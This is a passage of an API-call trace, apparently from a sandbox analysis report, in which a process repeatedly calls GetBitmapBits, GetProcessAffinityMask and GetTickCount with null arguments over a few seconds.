hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0247.526] GetTickCount () returned 0x2029239 [0247.526] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0247.526] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0247.526] GetTickCount () returned 0x2029239 [0247.526] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0247.526] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0247.526] GetTickCount () returned 0x2029239 [0247.526] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0247.526] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0247.526] GetTickCount () returned 0x2029239 [0247.526] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0247.526] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0247.526] GetTickCount () returned 0x2029239 [0247.526] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0247.526] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0247.526] GetTickCount () returned 0x2029239 [0247.526] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0247.526] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0247.526] GetTickCount () returned 0x2029239 [0247.526] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0247.526] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0247.526] GetTickCount () returned 0x2029239 [0252.245] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0252.245] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0252.245] GetTickCount () returned 0x202a4a8 [0252.245] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0252.245] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0252.245] GetTickCount () returned 0x202a4a8 [0252.245] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0252.245] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0252.245] GetTickCount () returned 0x202a4a8 [0252.245] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0252.245] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0252.245] GetTickCount () returned 0x202a4a8 [0252.245] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0252.245] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0252.245] GetTickCount () returned 0x202a4a8 [0252.245] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0252.246] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0252.246] GetTickCount () returned 0x202a4a8 [0252.246] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0252.246] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0252.246] GetTickCount () returned 0x202a4a8 [0252.246] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0252.246] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0252.246] GetTickCount () returned 0x202a4a8 [0252.246] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0252.246] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0252.246] GetTickCount () returned 0x202a4a8 [0252.246] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0252.246] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0252.246] GetTickCount () returned 0x202a4a8 [0252.246] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0252.246] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0252.246] GetTickCount () returned 0x202a4a8 [0252.246] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0252.247] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0252.247] GetTickCount () returned 0x202a4a8 [0252.247] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0252.247] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0252.247] GetTickCount () returned 0x202a4a8 [0252.247] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0252.247] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0252.247] GetTickCount () returned 0x202a4a8 [0252.247] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0252.247] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0252.247] GetTickCount () returned 0x202a4a8 [0252.247] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0252.247] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0252.247] GetTickCount () returned 0x202a4a8 [0252.247] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0252.247] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0252.247] GetTickCount () returned 0x202a4a8 [0252.247] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0252.247] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0252.247] GetTickCount () returned 0x202a4a8 [0252.247] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0252.247] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0252.247] GetTickCount () returned 0x202a4a8 [0252.247] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0252.247] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0252.248] GetTickCount () returned 0x202a4a8 [0252.248] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0252.248] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0252.248] GetTickCount () returned 0x202a4a8 [0252.248] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0252.248] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0252.248] GetTickCount () returned 0x202a4a8 [0252.248] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0252.248] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0252.248] GetTickCount () returned 0x202a4a8 [0252.248] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0252.248] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0252.248] GetTickCount () returned 0x202a4a8 [0252.248] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0252.248] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0252.248] GetTickCount () returned 0x202a4a8 [0252.248] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0252.248] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0252.248] GetTickCount () returned 0x202a4a8 [0252.248] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0252.248] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0252.248] GetTickCount () returned 0x202a4a8 [0252.248] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0252.248] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0252.249] GetTickCount () returned 0x202a4a8 [0252.249] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0252.249] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0252.249] GetTickCount () returned 0x202a4a8 [0252.249] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0252.249] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0252.249] GetTickCount () returned 0x202a4a8 [0252.249] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0252.249] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0252.249] GetTickCount () returned 0x202a4a8 [0252.249] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0252.249] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0252.249] GetTickCount () returned 0x202a4a8 [0252.249] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0252.249] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0252.249] GetTickCount () returned 0x202a4a8 [0252.249] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0252.249] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0252.249] GetTickCount () returned 0x202a4a8 [0252.249] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0252.249] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0252.249] GetTickCount () returned 0x202a4a8 [0252.249] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0252.249] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0252.249] GetTickCount () returned 0x202a4a8 [0252.249] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0252.250] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0252.250] GetTickCount () returned 0x202a4a8 [0252.250] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0252.250] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0252.250] GetTickCount () returned 0x202a4a8 [0252.250] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0252.250] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0252.250] GetTickCount () returned 0x202a4a8 [0252.250] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0252.250] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0252.250] GetTickCount () returned 0x202a4a8 [0252.250] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0252.250] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0252.250] GetTickCount () returned 0x202a4a8 [0252.250] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0252.250] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0252.250] GetTickCount () returned 0x202a4a8 [0252.250] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0252.250] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0252.250] GetTickCount () returned 0x202a4a8 [0252.250] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0252.250] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0252.251] GetTickCount () returned 0x202a4a8 [0252.251] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0252.251] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0252.251] GetTickCount () returned 0x202a4a8 [0252.251] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0252.251] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0252.251] GetTickCount () returned 0x202a4a8 [0252.251] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0252.251] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0252.251] GetTickCount () returned 0x202a4a8 [0252.251] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0252.251] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0252.251] GetTickCount () returned 0x202a4a8 [0252.251] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0252.251] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0252.251] GetTickCount () returned 0x202a4a8 [0252.251] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0252.251] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0252.251] GetTickCount () returned 0x202a4a8 [0252.251] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0252.251] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0252.251] GetTickCount () returned 0x202a4a8 [0252.251] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0252.252] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0252.252] GetTickCount () returned 0x202a4a8 [0252.252] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0252.252] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0252.252] GetTickCount () returned 0x202a4a8 [0252.252] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0252.252] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0252.252] GetTickCount () returned 0x202a4a8 [0252.252] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0252.252] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0252.252] GetTickCount () returned 0x202a4a8 [0252.252] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0252.252] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0252.252] GetTickCount () returned 0x202a4a8 [0252.252] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0252.252] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0252.252] GetTickCount () returned 0x202a4a8 [0252.252] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0252.252] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0252.252] GetTickCount () returned 0x202a4a8 [0252.252] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0252.252] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0252.252] GetTickCount () returned 0x202a4a8 [0252.252] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0252.252] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0252.253] GetTickCount () returned 0x202a4a8 [0252.253] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0252.253] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0252.253] GetTickCount () returned 0x202a4a8 [0252.253] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0252.253] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0252.253] GetTickCount () returned 0x202a4a8 [0252.253] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0252.253] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0252.253] GetTickCount () returned 0x202a4a8 [0252.253] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0252.253] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0252.253] GetTickCount () returned 0x202a4a8 [0252.253] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0252.253] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0252.253] GetTickCount () returned 0x202a4a8 [0252.253] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0252.253] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0252.253] GetTickCount () returned 0x202a4a8 [0252.253] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0252.253] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0252.253] GetTickCount () returned 0x202a4a8 [0252.253] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0252.253] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0252.253] GetTickCount () returned 0x202a4a8 [0252.253] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0252.254] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0252.254] GetTickCount () returned 0x202a4a8 [0252.254] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0252.254] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0252.254] GetTickCount () returned 0x202a4a8 [0252.254] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0252.254] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0252.254] GetTickCount () returned 0x202a4a8 [0252.254] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0252.254] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0252.254] GetTickCount () returned 0x202a4a8 [0252.254] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0252.254] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0252.254] GetTickCount () returned 0x202a4a8 [0252.254] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0252.254] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0252.254] GetTickCount () returned 0x202a4a8 [0252.254] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0252.254] GetProcessAffinityMask (in: hProcess=0x0, 